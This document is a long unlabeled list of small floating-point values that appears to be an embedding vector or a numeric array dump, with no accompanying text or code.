-0.028190962970256805, 0.02007869817316532, 0.02081923745572567, -0.027298951521515846, 0.005331037566065788, -0.0006279852823354304, 0.011890695430338383, -0.022889379411935806, -0.011739222332835197, 0.008002867922186852, -0.015441915951669216, 0.0002446986036375165, 0.021509284153580666, 0.05156842619180679, 0.004897654056549072, -0.05453057959675789, 0.016889331862330437, 0.021694418042898178, 0.02369724027812481, -0.023512104526162148, 0.004081378225237131, -0.00849936529994011, 0.039585161954164505, -0.010384372435510159, 0.025902025401592255, -0.02903248369693756, 0.02083606645464897, 0.05863720178604126, 0.024505099281668663, 0.023444782942533493, -0.019641106948256493, -0.014482581056654453, 0.005869611166417599, 0.01604781113564968, -0.03931587561964989, -0.004133973270654678, 0.004859785549342632, -0.05045761540532112, 0.008861219510436058, 0.03165803104639053, 0.026491090655326843, -0.05651656910777092, 0.04160481318831444, 0.007443255744874477, 0.01269014086574316, 0.027315780520439148, -0.050053685903549194, 0.0031746390741318464, 0.009761647321283817, 0.0038667903281748295, 0.029352262616157532, -0.010990267619490623, -0.0012202059151604772, 0.023007191717624664, 0.004091897048056126, 0.018294673413038254, -0.008608763106167316, 0.0030484108719974756, 0.03982078656554222, -0.040191058069467545, -0.0440620556473732, -0.016056226566433907, -0.03453603386878967, -0.014423674903810024, 0.00005052414780948311, 0.01883324608206749, 0.013127732090651989, -0.010224483907222748, -0.010308635421097279, 0.03887828439474106, -0.03217977285385132, -0.00950077548623085, -0.03111945651471615, -0.005465680733323097, 0.015988904982805252, -0.03766649216413498, -0.02657524310052395, 0.018109537661075592, 0.001477921730838716, 0.010123501531779766, -0.02416849136352539, -0.008188001811504364, 0.05412665009498596, -0.038508012890815735, -0.007089816965162754, -0.0516357459127903, -0.024824878200888634, 0.011798128485679626, 0.03581514582037926, -0.012109491042792797, -0.027585068717598915, -0.030883831903338432, -0.005246885120868683, 0.03510826826095581, -0.04281660169363022, 0.004662028048187494, 0.023916035890579224, 0.007876639254391193, -0.03408161178231239, 0.005688684061169624, -0.009155751205980778, -0.010409618727862835, 0.01915302500128746, -0.03628639876842499, -0.02570006065070629, -0.039282213896512985, 0.007758826483041048, -0.06479714065790176, -0.03514192998409271, 0.02645742893218994, 0.0136663056910038, -0.012117906473577023, -0.017284847795963287, -0.007043533027172089, 0.010754642076790333, 0.0035596350207924843, 0.025716891512274742, -0.025346621870994568, -0.002083817031234503, 0.004973390605300665, 0.03827238827943802, 0.009837384335696697, 0.0009866837644949555, -0.028796859085559845, 0.009904705919325352, 0.04197508096694946, -0.01155408751219511, 0.0077251652255654335, -0.007127685472369194, -0.02689502015709877, 0.05426129326224327, 0.029200788587331772, 0.003544908482581377, -0.048538949340581894, 0.012260965071618557, 0.018749093636870384, 0.013405433855950832, 0.0028990409336984158, -0.016822010278701782, -0.04591340199112892, -0.007514785043895245, -0.002964258659631014, -0.01412914227694273, 0.05688684061169624, 0.0021301007363945246, 0.028342436999082565, 0.013287621550261974, 0.004354872740805149, -0.018496638163924217, 0.01692299358546734, -0.03830605000257492, 0.02793850749731064, -0.020482627674937248, -0.02386554330587387, 0.004384325817227364, 0.02309134416282177, -0.015475576743483543, 0.014625639654695988, -0.00861297082155943, 0.008154341019690037, 0.01550923753529787, 0.0011392094893381, -0.011848620139062405, -0.0005611894885078073, -0.03968614339828491, -0.0125386668369174, 0.005150110460817814, 0.012563913129270077, -0.021391471847891808, 0.003624852979555726, -0.001403236761689186, -0.02645742893218994, 0.035916127264499664, -0.005962178576737642, 0.03127093240618706, 0.012328286655247211, -0.00690888985991478, -0.014289031736552715, 0.00903793890029192, 0.0018986824434250593, 0.027837524190545082, -0.007245498243719339, -0.025716891512274742, 0.00849936529994011, -0.027147477492690086, -0.005688684061169624, 0.04547581076622009, 0.042177047580480576, 0.0015420877607539296, 0.008011282421648502, -0.012143151834607124, 0.033963799476623535, 0.0175036434084177, -0.01662004552781582, 0.007577899377793074, -0.016855672001838684, -0.03376183286309242, 0.013632644899189472, 0.02081923745572567, 0.02474072575569153, 0.02948690578341484, -0.0516694076359272, -0.018160030245780945, 0.04423036053776741, 0.04332151636481285, -0.010519016534090042, 0.017722439020872116, -0.008040735498070717, 0.009938366711139679, -0.021643927320837975, 0.008743406273424625, 0.002179540228098631, 0.011133327148854733, 0.03271834924817085, 0.03756551072001457, -0.01422171015292406, -0.011941187083721161, -0.014171218499541283, -0.0456104539334774, 0.011924357153475285, 0.008293191902339458, -0.01040120329707861, 0.009753231890499592, 0.005966385826468468, -0.017251186072826385, -0.016535893082618713, -0.008987447246909142, -0.030614543706178665, 0.02250227890908718, 0.0002082765131490305, 0.013556907884776592, -0.01869860291481018, -0.01161299366503954, 0.03709425777196884, 0.005785458721220493, -0.01612354815006256, 0.0022489656694233418, 0.007380141876637936, 0.015542898327112198, -0.014600394293665886, 0.018631281331181526, -0.015542898327112198, -0.024218982085585594, 0.0015894233947619796, 0.012218888849020004, -0.011512011289596558, -0.024942690506577492, 0.021610267460346222, -0.0041276621632277966, -0.02992449700832367, 0.009416623041033745, -0.0062314653769135475, -0.024942690506577492, -0.05288119614124298, -0.040965255349874496, -0.007851393893361092, -0.013641060329973698, -0.006988834124058485, 0.016981899738311768, -0.01762145571410656, -0.007514785043895245, 0.018345164135098457, 0.031691692769527435, 0.006492336746305227, 0.01040120329707861, -0.028342436999082565, -0.0035848806146532297, -0.04547581076622009, -0.04022471606731415, -0.020634101703763008, 0.02627229504287243, -0.011789713054895401, 0.03618541732430458, -0.0018692291341722012, -0.018025385215878487, 0.03675765171647072, 0.028359267860651016, -0.032129283994436264, -0.004039302002638578, 0.030749188736081123, -0.026406938210129738, -0.020617270842194557, 0.012807954102754593, -0.0067616235464811325, -0.007476916536688805, -0.042311690747737885, -0.005427812226116657, -0.013464340940117836, 0.0094839446246624, 0.025329791009426117, 0.0170744676142931, 0.02384871430695057, -0.03231441602110863, -0.02324281819164753, 0.020314324647188187, 0.00345444492995739, 0.00882755871862173, 0.009307225234806538, -0.020785575732588768, 0.009828968904912472, 0.02310817502439022, -0.019573785364627838, -0.02354576624929905, -0.009223073720932007, -0.01578694023191929, 0.06398928165435791, -0.0077041275799274445, 0.03810408338904381, 0.00729598943144083, -0.0027307365089654922, -0.002886418020352721, 0.018008556216955185, -0.009854214265942574, 0.05574237182736397, -0.04046034440398216, -0.014331107959151268, -0.012664895504713058, -0.012185228057205677, -0.018799586221575737, -0.011368952691555023, 0.012210474349558353, 0.01733533851802349, -0.001954433275386691, -0.015004324726760387, 0.019977714866399765, 0.01943914219737053, -0.0034397183917462826, -0.013800948858261108, 0.006067368667572737, -0.004729349631816149, 0.0091136759147048, 0.005120656918734312, -0.003568050218746066, 0.01701555959880352, 0.0117644676938653, -0.029520567506551743, 0.009231488220393658, 0.020432136952877045, -0.018900567665696144, 0.04072963073849678, -0.04729349538683891, -0.020011376589536667, 0.0016620045062154531, 0.00015213126607704908, -0.0006016877014189959, 0.008634008467197418, 0.0015221015783026814, 0.017587795853614807, 0.025498095899820328, -0.003849959932267666, -0.010418033227324486, -0.008835973218083382, 0.007199214771389961, 0.01654430851340294, -0.03037891909480095, 0.02051628939807415, -0.006509167142212391, -0.0016504336381331086, -0.001628343714401126, -0.013195053674280643, -0.01201692409813404, -0.00882755871862173, -0.004986013751477003, 0.01610671728849411, -0.00501967454329133, 0.010990267619490623, 0.039282213896512985, -0.002179540228098631, 0.0065638660453259945, 0.008486742153763771, 0.03477165848016739, -0.006732170470058918, 0.014230124652385712, 0.01885007694363594, 0.03401429206132889, -0.041571151465177536, -0.024538761004805565, 0.027012834325432777, -0.00576862832531333, 0.007729372940957546, -0.04577875882387161, 0.03209562227129936, 0.02600300870835781, 0.017688777297735214, 0.06334972381591797, -0.020028207451105118, 0.014617225155234337, 0.003355566179379821, 0.011587748304009438, 0.016342343762516975, -0.002943220781162381, -0.0014463646803051233, -0.0033113863319158554, -0.013784118928015232, 0.039450518786907196, -0.036219075322151184, 0.0046956888400018215, 0.023343801498413086, -0.0243367962539196, 0.002213201019912958, 0.00865083932876587, 0.019203515723347664, -0.03632006049156189, -0.00201544351875782, -0.007363311480730772, -0.05177038908004761, -0.0022573808673769236, 0.008242701180279255, 0.03968614339828491, 0.008495157584547997, -0.00802390556782484, -0.0319441482424736, -0.021660758182406425, -0.0007836666773073375, -0.00831002276390791, 0.029049314558506012, -0.014785529114305973, 0.0031094211153686047, -0.002490903018042445, 0.028611723333597183, 0.0016251880442723632, -0.009399793110787868, 0.01032546628266573, 0.01885007694363594, 0.005061750765889883, -0.000265868118731305, 0.03534389287233353, -0.023579426109790802, 0.007380141876637936, 0.004699896555393934, -0.00573075981810689, -0.00351124769076705, -0.02568322978913784, -0.0273662731051445, -0.0012833200162276626, -0.017124958336353302, 0.030261104926466942, 0.004375910852104425, -0.017251186072826385, -0.0010755694238469005, 0.010729396715760231, 0.022603262215852737, 0.027248458936810493, -0.016830425709486008, 0.010704150423407555, 0.014465751126408577, -0.02250227890908718, 0.0027791240718215704, -0.015391424298286438, -0.003898347495123744, 0.010965022258460522, 0.0011897006770595908, 0.009719571098685265, -0.05042395740747452, 0.0273662731051445, -0.03554585948586464, -0.010737812146544456, 0.0049313148483633995, -0.015517652966082096, -0.0073675187304615974, -0.0035385971423238516, -0.008511987514793873, -0.0190015509724617, 0.020179681479930878, 0.014886511489748955, 0.016737857833504677, -0.00030584039632230997, 0.0035470123402774334, -0.0009261993691325188, 0.017057636752724648, -0.02129048854112625, -0.029402753338217735, -0.026070330291986465, 0.002606612164527178, -0.015374594368040562, -0.016140379011631012, -0.02250227890908718, 0.03359353169798851, -0.005415189545601606, 0.0024866953026503325, -0.019573785364627838, 0.02990766614675522, -0.0007200266700237989, -0.008179587312042713, 0.001629395643249154, 0.00347337918356061, -0.03145606443285942, -0.01794123463332653, -0.01222730427980423, -0.010737812146544456, -0.018513469025492668, -0.009281979873776436, -0.029301771894097328, -0.006387146655470133, -0.0076283905655145645, -0.02172807976603508, -0.004447440151125193, -0.014246955513954163, 0.027467254549264908, -0.0035701540764421225, 0.0053646983578801155, 0.007939753122627735, -0.048404306173324585, 0.02428630366921425, -0.025178316980600357, 0.004047717433422804, -0.0005969541380181909, 0.015273611061275005, 0.0163170974701643, -0.004998636431992054, -0.026474259793758392, -0.007510577328503132, 0.015138967894017696, -0.029554227367043495, 0.003162016160786152, 0.005587701220065355, -0.013001504354178905, 0.0024446193128824234, -0.027231628075242043, 0.0350072868168354, -0.010729396715760231, -0.018176859244704247, 0.021963706240057945, 0.01389351673424244, 0.0058359503746032715, -0.03662300482392311, -0.006399769335985184, 0.018900567665696144, 0.026491090655326843, -0.007699919864535332, -0.021324150264263153, 0.0030715526081621647, -0.013169808313250542, 0.024387286975979805, 0.020263832062482834, 0.00808281172066927, 0.016931409016251564, 0.04116722196340561, 0.0054236045107245445, -0.008869634009897709, -0.023293308913707733, 0.003723731730133295, -0.0062525030225515366, -0.00238992040976882, -0.009492360055446625, -0.012572328560054302, -0.0007657843525521457, -0.005608739331364632, 0.02324281819164753, -0.035781484097242355, -0.010838794521987438, 0.02615448087453842, 0.014423674903810024, -0.01381777971982956, 0.002852757228538394, -0.006812114734202623, 0.02337746135890484, -0.007220252882689238, 0.0027370480820536613, -0.009391377680003643, 0.006643810775130987, 0.008103850297629833, -0.025750551372766495, -0.01731850765645504, 0.020785575732588768, 0.0035785692743957043, 0.017570964992046356, -0.03037891909480095, 0.0440620556473732, 0.011503595858812332, 0.023730900138616562, -0.0026129235047847033, 0.02797216735780239, 0.028376098722219467, 0.022586431354284286, 0.001981782726943493, -0.008263738825917244, 0.022704243659973145, 0.002480383962392807, 0.004058236256241798, -0.04197508096694946, 0.03810408338904381, -0.026507921516895294, 0.00679528433829546, -0.0010387528454884887, 0.0409989170730114, 0.017537303268909454, -0.0022384466137737036, -0.0113857826218009, -0.0015042192535474896, -0.00972798652946949, 0.04594706371426582, 0.01009825523942709, 0.003879413241520524, 0.021526115015149117, -0.003101005917415023, 0.009770061820745468, -0.0031094211153686047, 0.005343660246580839, 0.0091136759147048, 0.03504094481468201, -0.020314324647188187, -0.013960838317871094, 0.00957651250064373, -0.02312500588595867, -0.004098208621144295, -0.01184020470827818, 0.03736354410648346, -0.00794816855341196, 0.0009477633284404874, 0.00573075981810689, 0.03854167461395264, -0.02004503645002842, -0.03009280189871788, -0.05389102175831795, -0.01209266111254692, -0.004350665025413036, -0.01269014086574316, -0.016973484307527542, 0.007472709286957979, 0.006727962754666805, 0.02231714501976967, -0.011646654456853867, 0.03510826826095581, -0.0014705584617331624, 0.0013148770667612553, 0.017705608159303665, 0.01343909464776516, 0.00023575745581183583, 0.005983216222375631, -0.014036575332283974, 0.0014610913349315524, 0.026204973459243774, 0.020314324647188187, 0.001087666256353259, 0.0027328403666615486, 0.01927083730697632, -0.011116496287286282, 0.00733385793864727, -0.053588077425956726, 0.02369724027812481, 0.0008572998340241611, -0.03527657315135002, -0.018193690106272697, 0.011318461038172245, -0.0013359150616452098, -0.019944055005908012, 0.016813594847917557, -0.017040805891156197, -0.0022784189786762, -0.00339764216914773, 0.0012359843822196126, -0.04348982125520706, -0.011713976040482521, -0.018361994996666908, -0.02400018647313118, 0.021643927320837975, -0.022872548550367355, -0.007636805530637503, -0.0349399633705616, -0.019708428531885147, -0.008322645910084248, 0.029672041535377502, 0.005343660246580839, -0.012673310935497284, -0.01807587780058384, 0.0006053693941794336, 0.019506463780999184, -0.0014589875936508179, -0.010123501531779766, -0.027231628075242043, -0.007043533027172089, -0.014230124652385712, -0.0029852967709302902, 0.016519062221050262, -0.015770109370350838, -0.005789666436612606, 0.018412485718727112, 0.022249823436141014, -0.023983357474207878, 0.011528842151165009, -0.008625593036413193, -0.024555591866374016, 0.020751915872097015, 0.002541394205763936, -0.0349399633705616, -0.00207224627956748, -0.0010908219264820218, -0.012639650143682957, -0.017352169379591942, 0.020011376589536667, 0.02570006065070629, -0.030176954343914986, 0.021778570488095284, -0.0163170974701643, 0.014322692528367043, 0.024370456114411354, -0.01290052104741335, -0.011116496287286282, -0.013220299035310745, -0.0121683981269598, 0.02080240659415722, 0.01315297745168209, 0.0004964975523762405, -0.0031851581297814846, 0.005183771252632141, -0.0028022658079862595, -0.021054862067103386, 0.008108058013021946, 0.01839565485715866, -0.045341167598962784, -0.0065259975381195545, 0.03675765171647072, 0.017974894493818283, 0.00015778523811604828, -0.003050514729693532, -0.018597621470689774, 0.026810867711901665, 0.027888014912605286, -0.016266606748104095, -0.01563546620309353, -0.023932864889502525, -0.005680268630385399, -0.008490949869155884, -0.021542945876717567, -0.01886690780520439, 0.028948333114385605, 0.02129048854112625, -0.010224483907222748, 0.017049221321940422, -0.004964975640177727, 0.004201294854283333, -0.016174038872122765, 0.015332518145442009, -0.008436250500380993, -0.00604633055627346, -0.0010177148506045341, 0.037767477333545685, -0.009096845053136349, 0.030648205429315567, -0.00033240090124309063, -0.0038057800848037004, -0.008040735498070717, -0.036252737045288086, -0.04039302095770836, 0.013043579645454884, -0.028965162113308907, 0.027888014912605286, -0.028477080166339874, -0.016005735844373703, -0.024707065895199776, -0.02431996539235115, -0.016476986929774284, -0.0024046471808105707, 0.02112218365073204, 0.005427812226116657, 0.015837430953979492, -0.04311954975128174, -0.0037026936188340187, 0.027753371745347977, -0.0098878750577569, 0.027113815769553185, -0.022838888689875603, 0.005962178576737642, 0.022990360856056213, -0.015526067465543747, 0.026827698573470116, 0.0013506417162716389, 0.02006186731159687, -0.04056132584810257, -0.0349063016474247, -0.021761741489171982, -0.0303957499563694, 0.006690094247460365, 0.024673404172062874, -0.019035210832953453, 0.013422264717519283, 0.013354943133890629, 0.01231987215578556, 0.03310544788837433, -0.018479807302355766, 0.01299308892339468, 0.013413849286735058, 0.002476176479831338, -0.0022489656694233418, -0.024252643808722496, -0.00940820761024952, 0.017688777297735214, 0.029688870534300804, -0.018614450469613075, 0.016519062221050262, 0.0380031019449234, -0.005974801257252693, -0.010409618727862835, 0.0018566063372418284, 0.012572328560054302, 0.018176859244704247, 0.024252643808722496, -0.017688777297735214, 0.011882280930876732, 0.019944055005908012, 0.0002195844572270289, 0.002989504486322403, -0.0077041275799274445, 0.02734944224357605, -0.0013864063657820225, 0.0015189459081739187, -0.025296129286289215, -0.015054815448820591, -0.04510554298758507, -0.01612354815006256, 0.03100164420902729, 0.05564138665795326, 0.025784213095903397, -0.033357903361320496, 0.012479760684072971, -0.029890837147831917, -0.009366132318973541, 0.004582083318382502, 0.020566780120134354, -0.001200219732709229, -0.027315780520439148, 0.0054236045107245445, 0.01572803221642971, 0.04268195852637291, -0.006807907018810511, -0.012294625863432884, 0.010737812146544456, 0.007569483947008848, -0.016594799235463142, 0.004645197652280331, 0.012328286655247211, -0.0062693334184587, -0.0045736683532595634, 0.023478444665670395, 0.004876615945249796, -0.034266747534275055, -0.002823303919285536, 0.007127685472369194, 0.013826195150613785, 0.0019081495702266693, 0.013035165145993233, -0.0018692291341722012, 0.01528202649205923, -0.005478303413838148, -0.006913097575306892, 0.009786892682313919, -0.008743406273424625, 0.0047335573472082615, -0.005495133809745312, -0.04497089609503746, -0.0190015509724617, 0.012126321904361248, -0.027130646631121635, -0.010081425309181213, 0.04116722196340561, -0.022115180268883705, -0.009071599692106247, -0.01856395974755287, 0.008793897926807404, 0.002518252469599247, -0.008911710232496262, -0.03584880754351616, -0.021761741489171982, -0.01733533851802349, 0.006576488725841045, 0.004935522563755512, -0.01625819131731987, 0.0019176166970282793, 0.02171124890446663, 0.003860478987917304, 0.009382962249219418, -0.01450782734900713, 0.008709745481610298, -0.002490903018042445, 0.020415306091308594, -0.0005172726232558489, -0.006202011834830046, 0.005444642622023821, 0.0006279852823354304, 0.019826240837574005, -0.014718207530677319, -0.04116722196340561, 0.034132104367017746, 0.01603098027408123, 0.0009640678181312978, -0.01002251822501421, -0.0016514855669811368, -0.015483992174267769, -0.00940820761024952, 0.03736354410648346, 0.016872501000761986, -0.00675741583108902, -0.01911936327815056, -0.025464434176683426, 0.004927107132971287, -0.0258347038179636, -0.03615175560116768, -0.005049127619713545, -0.028510741889476776, 0.013523247092962265, 0.0021448275074362755, -0.02384871430695057, -0.00955968163907528, -0.008209040388464928, 0.021980535238981247, -0.01881641522049904, -0.009871045127511024, -0.019354989752173424, -0.0027749163564294577, 0.013708381913602352, 0.012740632519125938, 0.011814959347248077, -0.006555451080203056, -0.0058359503746032715, 0.018597621470689774, 0.02081923745572567, 0.008511987514793873, -0.032583706080913544, 0.024656573310494423, -0.015458745881915092, -0.005141695030033588, 0.005124864634126425, 0.007699919864535332, -0.002842238172888756, -0.00047335572890006006, -0.011823373846709728, 0.018042216077446938, -0.0125386668369174, -0.005032297223806381, -0.005385736469179392, -0.005200601648539305, -0.01794123463332653, 0.012698556296527386, 0.016645291820168495, -0.019859902560710907, -0.005150110460817814, 0.007885054685175419, 0.020634101703763008, 0.009441869333386421, 0.0074306330643594265, -0.000043193711462663487, 0.0033723965752869844, 0.02538028173148632, 0.011436274275183678, -0.011730806902050972, 0.016300266608595848, -0.019254006445407867, -0.017369000241160393, 0.002745463280007243, 0.009711155667901039, -0.012033754028379917, 0.013843025080859661, -0.011848620139062405, 0.027147477492690086, -0.02884734980762005, -0.019556954503059387, -0.010897700674831867, -0.00834789127111435, -0.006732170470058918, 0.015063230879604816, 0.0023225988261401653, -0.0034291993360966444, 0.0023352215066552162, -0.018294673413038254, 0.006883644033223391, 0.027231628075242043, 0.003822610480710864, -0.016443325206637383, -0.014482581056654453, 0.002488799160346389, 0.020852897316217422, -0.03308861702680588, 0.006673263851553202, 0.006660641171038151, 0.010342296212911606, 0.018294673413038254, 0.00630720192566514, 0.0019744192250072956, -0.020112358033657074, -0.019960885867476463, 0.0016304474556818604, -0.02140830084681511, -0.0007252861396409571, 0.005928517319262028, -0.018513469025492668, 0.0034712753258645535, -0.007300197146832943, -0.028897840529680252, -0.027130646631121635, -0.008297399617731571, -0.00783456303179264, -0.03207879140973091, 0.02038164623081684, 0.019960885867476463, 0.035478536039590836, 0.0030967984348535538, 0.0364210419356823, 0.011200648732483387, 0.002568743657320738, 0.010047764517366886, 0.0014095482183620334, 0.008852804079651833, 0.014272200874984264, 0.008490949869155884, -0.007460086140781641, -0.021088523790240288, 0.004880823660641909, 0.02112218365073204, -0.025329791009426117, 0.03219660371541977, 0.028157303109765053, 0.00429175840690732, 0.0243367962539196, -0.0015505029587075114, 0.00041076759225688875, 0.004737765062600374, 0.004922899417579174, 0.01353166252374649, -0.016325512900948524, -0.00919782742857933, -0.02766921930015087, 0.0040077450685203075, -0.00546988844871521, -0.012193643487989902, -0.010535846464335918, 0.014920172281563282, -0.000673217058647424, -0.007173968944698572, 0.016990315169095993, 0.032129283994436264, 0.014474166557192802, -0.007443255744874477, 0.022670583799481392, 0.0035407007671892643, 0.012412439100444317, -0.01601414941251278, -0.0003408161283005029, -0.02337746135890484, -0.004005641210824251, 0.0012422958388924599, -0.016603214666247368, 0.011596163734793663, 0.019068872556090355, -0.006778453942388296, -0.008129095658659935, 0.024101169779896736, 0.006648018024861813, -0.0052048093639314175, -0.010460109449923038, 0.009265149012207985, -0.007624182850122452, 0.0029852967709302902, 0.006004254333674908, -0.04237901046872139, -0.02034798450767994, 0.017234355211257935, -0.03938319534063339, 0.014979079365730286, 0.012934181839227676, -0.014188049361109734, -0.0045357998460531235, -0.02962154895067215, 0.01330445148050785, 0.013523247092962265, -0.019556954503059387, 0.004960767924785614, 0.00322933797724545, 0.01422171015292406, -0.0002162972668884322, 0.016746273264288902, 0.007990244776010513, -0.0023983356077224016, 0.007699919864535332, -0.035781484097242355, 0.0002398335636826232, -0.002192162908613682, 0.014103896915912628, -0.009206242859363556, -0.0023036645725369453, -0.013506417162716389, 0.015130552463233471, 0.018934229388833046, 0.02216567099094391, 0.01428061630576849, -0.0250605046749115, -0.006774246226996183, -0.018008556216955185, -0.010005688294768333, 0.02098754048347473, 0.034401390701532364, 0.0018555544083938003, -0.01763828657567501, 0.018294673413038254, 0.017671946436166763, 0.019876733422279358, -0.001605201861821115, 0.012218888849020004, 0.02443777769804001, -0.014087066054344177, -0.03312227874994278, -0.01215156726539135, -0.003082071663811803, 0.010291805490851402, 0.015677541494369507, 0.010291805490851402, -0.0029263903852552176, 0.017705608159303665, -0.008482534438371658, 0.013708381913602352, -0.015307271853089333, -0.0189678892493248, 0.024959521368145943, 0.007098231930285692, -0.00039051848580129445, -0.004897654056549072, 0.016931409016251564, 0.00505754305049777, 0.014701376669108868, 0.006820530164986849, 0.01002251822501421, 0.003662721486762166, -0.007245498243719339, -0.015685956925153732, -0.0008262686897069216, -0.03224709630012512, -0.0042244368232786655, 0.01276587788015604, -0.007418010383844376, 0.011310046538710594, -0.010662075132131577, -0.013834609650075436, -0.005453058052808046, -0.015096891671419144, 0.01777292974293232, 0.0023836090695112944, 0.025784213095903397, 0.005987423937767744, -0.002253173151984811, -0.013253960758447647, 0.008953786455094814, 0.01201692409813404, 0.006715340074151754, -0.012193643487989902, -0.014726622961461544, 0.0032167150638997555, 0.0007200266700237989, -0.0026823491789400578, 0.016990315169095993, 0.011545672081410885, 0.007064571138471365, -0.00018092707614414394, -0.034872643649578094, 0.00401195278391242, 0.00791030004620552, -0.009786892682313919, 0.0038099875673651695, 0.0190015509724617, -0.00634507043287158, -0.0151978749781847, 0.011377368122339249, -0.011419444344937801, 0.004476893227547407, -0.017419490963220596, 0.012622819282114506, 0.003119940171018243, 0.027399932965636253, 0.01019082311540842, -0.004173945635557175, 0.013253960758447647, -0.004249682649970055, 0.012059000320732594, 0.010754642076790333, -0.003044203156605363, 0.016965068876743317, -0.01790757291018963, -0.014541488140821457, 0.01389351673424244, -0.004346457310020924, 0.041537489742040634, -0.019472802057862282, -0.01558497454971075, -0.002894833218306303, -0.02689502015709877, 0.011108080856502056, 0.004548422526568174, -0.008634008467197418, -0.015164213255047798, -0.014145973138511181, -0.001388510107062757, -0.010998683050274849, 0.03130459040403366, -0.005945347715169191, -0.022872548550367355, 0.024690235033631325, -0.021189505234360695, -0.01368313655257225, -0.006235672626644373, -0.015307271853089333, -0.01959061622619629, -0.004279135726392269, 0.021189505234360695, -0.003860478987917304, 0.006736377719789743, -0.018597621470689774, -0.0007368570659309626, -0.01974209025502205, -0.018648112192749977, -0.004645197652280331, -0.03302129730582237, -0.008667669259011745, -0.004640989936888218, 0.015374594368040562, 0.02248544804751873, 0.0005070165498182178, 0.008760236203670502, 0.01086403988301754, 0.00011360537610016763, -0.05136645957827568, -0.010131916031241417, 0.014575148932635784, -0.000837839615996927, 0.00110134098213166, 0.03813774511218071, 0.010291805490851402, 0.022754736244678497, 0.04120088368654251, 0.004401156213134527, 0.0004268090706318617, 0.007636805530637503, -0.0033134901896119118, 0.012799538671970367, -0.020129188895225525, 0.0007826148066669703, -0.005061750765889883, 0.005074373446404934, -0.002593989484012127, -0.015904752537608147, 0.006256710737943649, -0.02172807976603508, 0.0009188360418193042, 0.01869860291481018, 0.01520628947764635, 0.0036648251116275787, 0.0031746390741318464, 0.017082883045077324, 0.0067237550392746925, -0.006378731224685907, 0.040494006127119064, 0.00009690643491921946, -0.0045568379573524, -0.0036585137713700533, 0.0060841990634799, -0.010586338117718697, 0.01375887356698513, -0.009324056096374989, 0.008718160912394524, -0.011890695430338383, 0.023663578554987907, 0.015719618648290634, 0.007851393893361092, 0.01550923753529787, -0.00828898511826992, 0.003039995674043894, 0.015063230879604816, 0.0018282049568369985, -0.024707065895199776, -0.01733533851802349, 0.023983357474207878, 0.008373136632144451, 0.011814959347248077, -0.011941187083721161, 0.00015581292973365635, 0.027315780520439148, -0.016914578154683113, 0.0006910993834026158, -0.02110535465180874, 0.004066651687026024, -0.016855672001838684, 0.0341489352285862, 0.015534482896327972, 0.010704150423407555, -0.022249823436141014, -0.03584880754351616, -0.022115180268883705, 0.009736401028931141, 0.011301631107926369, -0.029234450310468674, -0.010695735923945904, -0.00459470646455884, -0.014339522458612919, -0.03236490860581398, 0.005789666436612606, 0.02112218365073204, -0.012496591545641422, 0.028914671391248703, 0.006816322449594736, -0.0266089029610157, 0.02007869817316532, -0.007190799340605736, 0.014718207530677319, 0.026558412238955498, 0.023158665746450424, -0.010291805490851402, 0.013826195150613785, -0.0038857245817780495, -0.015913167968392372, -0.007716750260442495, 0.02337746135890484, 0.009610173292458057, -0.005549832712858915, -0.02416849136352539, 0.01168873067945242, 0.004998636431992054, -0.006248295772820711, 0.004784048534929752, 0.005352075211703777, -0.01368313655257225, -0.01443209033459425, 0.01731850765645504, -0.0016914578154683113, -0.007607352454215288, 0.014331107959151268, -0.01162982452660799, 0.013018334284424782, 0.008793897926807404, 0.027450423687696457, 0.003525974228978157, -0.00018579211609903723, 0.012033754028379917, -0.0243031345307827, 0.019792580977082253, -0.011116496287286282, 0.012387193739414215, 0.0008409953443333507, -0.00015436655667144805, -0.003159912535920739, 0.004758802708238363, 0.009955196641385555, -0.013119316659867764, 0.0033029711339622736, 0.0004404837964102626, -0.02445460855960846, 0.002132204594090581, -0.01807587780058384, -0.012387193739414215, 0.01778976060450077, 0.022990360856056213, -0.015534482896327972, -0.002964258659631014, 0.03236490860581398, -0.008028113283216953, 0.008377344347536564, 0.017116542905569077, -0.019472802057862282, -0.014962248504161835, 0.003643787233158946, 0.007977621629834175, 0.0029579473193734884, 0.009702740237116814, -0.021038033068180084, -0.01718386448919773, 0.01633392833173275, 0.002528771525248885, -0.000259030784945935, 0.005966385826468468, -0.001186545006930828, -0.0058191195130348206, -0.010258144699037075, -0.008057566359639168, -0.010317050851881504, 0.007342273369431496, 0.030463071539998055, -0.01222730427980423, 0.001831360743381083, -0.02233397588133812, 0.011267970316112041, 0.019960885867476463, -0.002734944224357605, 0.012673310935497284, -0.014844435267150402, -0.014928587712347507, 0.002852757228538394, -0.007005664985626936, -0.005793874152004719, -0.012580743059515953, -0.004203398711979389, -0.0012633338337764144, -0.007939753122627735, 0.012462930753827095, 0.01730167865753174, -0.0009751127799972892, -0.015298857353627682, -0.0009335626964457333, -0.0014810775173828006, -0.00919782742857933, -0.002608716022223234, -0.004851370118558407, -0.022132009267807007, 0.009610173292458057, 0.0011423651594668627, 0.003997226245701313, -0.03322326019406319, 0.014011329971253872, -0.017007146030664444, 0.0010413825511932373, 0.004115039017051458, 0.0069972495548427105, -0.007859809324145317, -0.015778524801135063, -0.022535940632224083, 0.025346621870994568, 0.0011644550831988454, 0.0022994568571448326, -0.010763057507574558, 0.001530516892671585, -0.024505099281668663, -0.007291782181710005, -0.010914531536400318, -0.008150133304297924, -0.0042812395840883255, 0.0022279275581240654, -0.0010834586573764682, -0.023444782942533493, -0.005478303413838148, -0.003997226245701313, 0.0015189459081739187, 0.015021154657006264, -0.011486765928566456, 0.0009146284428425133, 0.021795401349663734, 0.010771472938358784, 0.00896220188587904, -0.0032230266369879246, 0.017823420464992523, -0.000008891855941328686, 0.019102532416582108, -0.0027559823356568813, 0.0017387933330610394, -0.00005857777068740688, 0.03053039312362671, -0.026861360296607018, 0.007325442973524332, -0.005217432044446468, -0.004302277695387602, 0.015500822104513645, 0.00345444492995739, 0.01805904693901539, -0.001097133383154869, 0.0063913543708622456, -0.004192879889160395, 0.00391728151589632, 0.007266536355018616, -0.035949788987636566, 0.01777292974293232, 0.021357810124754906, -0.0031094211153686047, -0.014364768750965595, -0.0006832100916653872, 0.04069596901535988, 0.03887828439474106, -0.0326678566634655, 0.012437684461474419, 0.002549809403717518, -0.0024824878200888634, 0.003980395849794149, 0.0028359268326312304, -0.01147835049778223, 0.016098301857709885, -0.003332424210384488, -0.0046578203327953815, 0.0021090626250952482, -0.008768651634454727, -0.014735037460923195, 0.0023415330797433853, 0.009256734512746334, -0.008608763106167316, -0.011991678737103939, -0.0022615885827690363, 